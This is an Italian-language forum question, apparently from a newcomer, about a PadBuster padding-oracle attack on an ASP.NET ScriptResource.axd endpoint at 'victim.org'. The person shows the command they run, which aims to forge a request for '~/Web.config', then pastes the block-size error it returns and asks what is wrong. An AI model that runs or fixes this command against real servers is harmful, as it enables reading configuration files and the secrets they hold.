Nuovo per questo tipo di attacco che sta cercando di capire questo attacco .net oracle padding, sto usando questi dati:
padbuster https://victim.org/ScriptResource.axd?d=EkIw9i8hChjP_nuqGrT3s8rxntkAiG3TGimvybqMf__tcw10GCO0odSOA1XbLy49N6SbB7O3zkdZuSKdG8IJgRcjH0myrb2kCR0Epem-HDIB7vYIUr_71uvYarEEFTV6Szv50Wpsr0A0218420DiUU1D4-NcTi4zxgAJaW8owIQ1 EkIw9i8hChjP_nuqGrT3s8rxntkAiG3TGimvybqMf__tcw10GCO0odSOA1XbLy49N6SbB7O3zkdZuSKdG8IJgRcjH0myrb2kCR0Epem-HDIB7vYIUr_71uvYarEEFTV6Szv50Wpsr0A0218420DiUU1D4-NcTi4zxgAJaW8owIQ1 -plaintext "|||~/Web.config" 16
E vedo questo errore:
+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| [email protected] |
+-------------------------------------------+
ERROR: Encrypted Bytes must be evenly divisible by Block Size (16)
Encrypted sample length is 124. Double check the Encoding and Block Size.
Sto facendo qualcosa di sbagliato? o qual è la dimensione del blocco corretta 124 ??